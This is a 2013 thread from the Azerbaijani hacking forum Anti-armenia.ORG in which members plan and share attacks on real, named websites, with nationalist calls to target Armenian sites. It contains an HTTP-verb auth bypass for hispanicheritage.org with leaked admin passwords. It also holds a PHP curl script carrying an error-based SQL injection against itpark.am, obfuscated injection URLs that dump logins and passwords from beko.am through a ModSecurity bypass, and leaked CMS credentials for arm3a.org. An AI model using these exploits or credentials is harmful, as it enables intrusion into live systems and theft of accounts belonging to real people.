Anti-armenia.ORG - Forumlar - admin/pass



Istifadəçi
     2013-03-26 22:43 GMT                 

mysql_exp


VIP
Mesaj Sayı : 12
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


sqli ilə admin və pass-lar çıxır lakin adminka yoxdu ;)

SQLİ_link

Yeganə tapdığım budur ki, onda da heç nə alınmır.

control_panel

Nə etməli?

Anti-armenia.ORG
     
 

Istifadəçi
     2013-03-27 02:01 GMT                 

BlackMinD


Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Əslində /admin/-ka var amma çox ehtimal ki, İP based restrcitondadır forbidden verir sənə.
http://www.hispanicheritage.org/admin/
2-ci control_panel-də form-un submit etidiyi url ölüb çoxdan
telnet cp.sgmhost.com 8443 ölüdür.

3-cüsü də sənə şad xəbər orda admikada HTTP VERB var+server misconfiguration+auth bypass var.
REQUEST METODU dəyiş COPY metodundan istifadə et (ürəyin istədiyin request metod keçəcək POST istisna olmaqla) sehrli yolla adminkada + bez parol olacaqsan
Fiddlerlə metodları manupulyasiya edə bilərsən.


Adminlər:

hhfadmin
703HHF@dm1n

vicalia
17Vicalia

Ən axırıncısı isə çox yaxşı olardıkı buna sərf etdiyin vaxtı+zəhməti erməni saytlarına qarşı edəsən.
Onda olar Super İş.
Kod:
Host: www.hispanicheritage.org
User-Agent: Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive


RETURN BODY: (admikanın source kodu)

[code]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Hispanic Heritage Awards</title>
<style type="text/css">
A:link {text-decoration: none; }
A:active {text-decoration: none; }
A:visited {text-decoration: none; }
A:hover {text-decoration: underline;}
.header { font-family: Verdana, Arial, Helvetica; font-size: 11px; color: #EEEEEE; font-weight: bold; }
.title { font-family: Verdana, Arial, Helvetica; font-size: 11px; color: #FFFFFF; font-weight: bold; }
.title2 { font-family: Verdana, Arial, Helvetica; font-size: 11px; color: #333333; font-weight: bold; }
.text { font-family: Verdana, Arial, Helvetica; font-size: 11px; color: #333333; }
.small { font-family: Verdana, Arial, Helvetica; font-size: 9px; color: #333333; }
.Button { background: #FFFFFF; border: 1px solid #666666; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; font-weight: normal;}
.Boton { background: #FFFFFF; border: 1px solid #666666; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; font-weight: normal;}
.Input { background: #FFFFFF; border: 1px solid #666666; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; font-weight: normal;}
</style>
</head>

<body topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<table border="0" cellspacing="0" cellpadding="0" background="img/head_bg.gif" width="100%">
<tr>
<td align="left">
<table border="0" cellspacing="0" cellpadding="0">
<tr>
<td rowspan="4"><img src="img/head_logo.gif" width="236" height="100" alt="" border="0"></td>
<td width="324"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
<td><img src="img/head_title.gif" width="200" height="70" alt="" border="0"></td>
</tr>
<tr>
<td colspan="2"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
</tr>
<tr>
<td height="28"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
<td height="28" align="center" class="header"><a href="index.php" class="header">Administration</a> | <a href="logout.php" class="header">Logout</a>&nbsp;</td>
</tr>
<tr>
<td colspan="2"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#FFFFFF" height="5"><img src="../img/spacer_1x1.gif" width="1" height="1" alt="" border="0"></td>
</tr>
</table>
<table border="0" cellpadding="3" cellspacing="1" width="100%" bgcolor="#000000">
<tr>
<td height="28" class="header" bgcolor="#443153">
> <a href="index.php" class="header">Home</a> &nbsp;
</td>
</tr>
</table>
<br>
<table width="95%" border="0" align="center">
<tr><td align="center">

<table border="0" cellpadding="3" cellspacing="1" bgcolor="#000000" width="400">
<tr bgcolor="#443153">
<th class="title">Sections</th>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="content_main.php" class="title2">Content</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="categories_main.php" class="title2">Hispanic Award Categories</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="honoree_main.php" class="title2">Hispanic Award Honorees</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="ycategories_main.php" class="title2">Youth Award Categories</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="regions_main.php" class="title2">Youth Awards Regions</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="youth_main.php" class="title2">Youth Award Honorees</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="presenters_main.php" class="title2">Presenters &amp; Performers</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="section_hispanic.php" class="title2">Section Hispanic Heritage Award</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="albums_main.php" class="title2">Albums</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="faqs_main.php" class="title2">Youth FAQ's</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="sponsorfaqs_main.php" class="title2">Sponsors FAQ's</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="sponsortestimonials_main.php" class="title2">Sponsors Testimonials</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE';">
<td class="title2"><a href="facts_main.php" class="title2">Hispanic Facts</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE';">
<td class="title2"><a href="loft_main.php" class="title2">Hispanic Loft</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="blinks_main.php" class="title2">Best Links</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE';">
<td class="title2"><a href="news_main.php" class="title2">News</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="press_main.php" class="title2">Press Releases</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE';">
<td class="title2"><a href="surveys_main.php" class="title2">Surveys</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF';" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD';">
<td class="title2"><a href="mailing_main.php" class="title2">Mailing List</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="section_home.php" class="title2">Home Honorees</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="heritage_main.php" class="title2">About your Hispanic Heritage</a></td>
</tr>
<tr bgcolor="#DDDDDD" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#DDDDDD'">
<td class="title2"><a href="admins_main.php" class="title2">Administrators</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
<td class="title2"><a href="media_main.php" class="title2">Media</a></td>
</tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
  <td class="title2"><a href="donation.php" class="title2">Donations</a></td>
  </tr>
<tr bgcolor="#EEEEEE" onMouseOver="this.style.background=parseURL(parseURL(parseURL(');););#FFFFFF'" onMouseOut="this.style.background=parseURL(parseURL(parseURL(');););#EEEEEE'">
  <td class="title2"><a href="/gallery/admin/" class="title2">ZenPhoto Gallery</a></td>
  </tr>
</table>

</td></tr>
</table>
</body>
</html>
]

Ana VƏTƏN!
Anti-armenia.ORG
     
 

Istifadəçi
     2013-03-27 12:26 GMT                 

mysql_exp


VIP
Mesaj Sayı : 12
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


SQLi vulnerable erməni saytları siyahısı olsaydı oyrənərdik üzərində..sən demiş, bu daha faydalı olardı.

Anti-armenia.ORG
     
 

Istifadəçi
     2013-03-27 20:25 GMT                 

lezgi099


İstifadəçi
Mesaj Sayı : 14
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


http://itpark.am/firm.php?lang=us&id=1064

Anti-armenia.ORG
     
 

Istifadəçi
     2013-03-28 06:14 GMT                 

BlackMinD


Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


itpark+həmin serverdəki saytlarla İMHO mənası yoxdur getməyin.
itparkda ümumiyyətlə login + passlar buraxmır.
O serverdə cəmi 1-nə basa bilmişəm.
Başdan ayağa injectiondur gəlki qıla-qıl gətirir o serverinki.
Baxın bəlkə kimsə əlavə nəsə edə bildi oralara.


http://pastebin.com/03W1nLn0
http://pastebin.com/tp3VMG6b

Ana VƏTƏN!
Anti-armenia.ORG
     
 

Istifadəçi
     2013-03-28 21:19 GMT                 

lezgi099


İstifadəçi
Mesaj Sayı : 14
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


$POST
<?php
$url = "http://itpark.am/firm.php?";
$ua = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7";
$post = "lang=us&id=1064 union select 1 from(select count(*),concat(version(),floor(rand(0)|0))x from information_schema.tables group by x)a-- -";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

echo curl_exec($ch);
?>

Anti-armenia.ORG
     
 

Istifadəçi
     2013-03-28 23:06 GMT                 

BlackMinD


Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#24761 lezgi099 :
$POST
<?php
$url = "http://itpark.am/firm.php?";
$ua = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7";
$post = "lang=us&id=1064 union select 1 from(select count(*),concat(version(),floor(rand(0)|0))x from information_schema.tables group by x)a-- -";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

echo curl_exec($ch);
?>


Qəşəng metoddur Respect)
Amma skriptdən asılıdır hər yerdə keçmiyəcək:
Bu metod o halda aktualdır ki, vulnerable skript $_REQUEST['parametername'] medotu istifadə edir.

Kod:
<?php


$id=$_REQUEST['id'];


echo htmlentities((string)$id);
/**
http://hacker1.own/12.php?id=12346
output: 123456


POST metodu ile yoxla:

eyni netice alacaqsan


******/



Belə bir hal da ola bilər:

Kod:
<?php


if (count($_REQUEST)!=0 && array_key_exists('id',$_REQUEST))
{


//echo 'TRUE!!';exit;

$reqmethod=strtoupper( htmlentities ( (string) $_SERVER['REQUEST_METHOD'] ) );

//echo $reqmethod;


switch($reqmethod)


{

case 'GET':
$id=htmlentities( (string )$_GET['id']);break;

case 'POST':
$id=htmlentities( (string) $_POST['id']);break;

case 'COOKIE':
$id=htmlentities( (string) $_COOKIE['id']);break;

default: break;



}

echo '<font color="red" >' . ' REQUEST METOD: '  . $reqmethod . ' value => ' . $id . '</font>' . PHP_EOL;


}



!isset($id) ? die('PARAMETER YOXDUR!') : '';
exit;


?>


Məhz elə bu itpark.am-da da o məsələdir.
Sadə bir misal dediklərimizə (aşağıda keçmir sırf lang parametrinə çünki $_GET['lang'] -expect edir skript (elə yazılıb skript)



============================================================
/index.php?

HEADERS:

Host: arm3a.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=83jfvpbeksf2kl2pfpln928a72
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 7



$_POST data:

lang=en

============================================================

Dil dəyişmir.
Çünki skriptdə $_GET['lang'] -ı expect edir.
$_REQUEST['lang'] expect etsəydi o halda yuxarıda mod sec bypass-ı qəbul edəcəkdi.O halda həm $_GET['lang'] həm də $_POST['lang'] -i götürəcəkdi.


Ikinci bir misal ModSec üçün.


http://www.beko.am/?page=service


Host: beko.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=83jfvpbeksf2kl2pfpln928a72
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 7



$_POST body:


lang=-2%27%20union%20%20select%201,2,3,4,5,6,7,8--%20and%205=%275



Nəticə: Skriptin heç q*zuna deyil parameter çünki skript bu halda $_GET['lang'] expect edir.



http://www.beko.am/?page=service&lang=-2%27%20%0D%0Aunion%0D%0D/*!40101%20select*/%0D%0A%0D%0A%0D%0A1,2,3,4,5,6,7,ulist_login%20frOm%20ulist%20lImiT%201%20offset%200--%20and%205=%275


http://www.beko.am/?page=service&lang=-2%27%20%0D%0Aunion%0D%0D/*!40101%20select*/%0D%0A%0D%0A%0D%0A1,2,3,4,5,6,7,ulist_password%20frOm%20ulist%20lImiT%201%20offset%200--%20and%205=%275


Sözümün canı curl metodu həmişə etibarlı deyil sırf skriptdən asılıdır necə yazılıb.$_REQUEST söhbəti varsa o halda girəcək bypass.(ModSec üçün)



arm3a.org/cms/
Login: superadmin

pass: arm3a

Ana VƏTƏN!
Anti-armenia.ORG
     
 

Istifadəçi
     2013-03-29 12:23 GMT                 

lezgi099


İstifadəçi
Mesaj Sayı : 14
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Step, elə məsələ də odur ki, $curl əksər web-developerlərin yadından çıxır ;)

Anti-armenia.ORG
     
 

Istifadəçi
     2013-03-29 14:49 GMT                 

BlackMinD


Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


lezgi099 orda curl-lun elədiyi qeyri-adi bir şey yoxdur) Sadə post zaprosdur standart.Onu adi brauzerdən də etmək olur 2x2 sadə.
Bəxbaxtçılıq ondadırki developerlər single request metod yerinə $_REQUEST istifadə edirlər)Bax budur problem.

Ana VƏTƏN!
Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG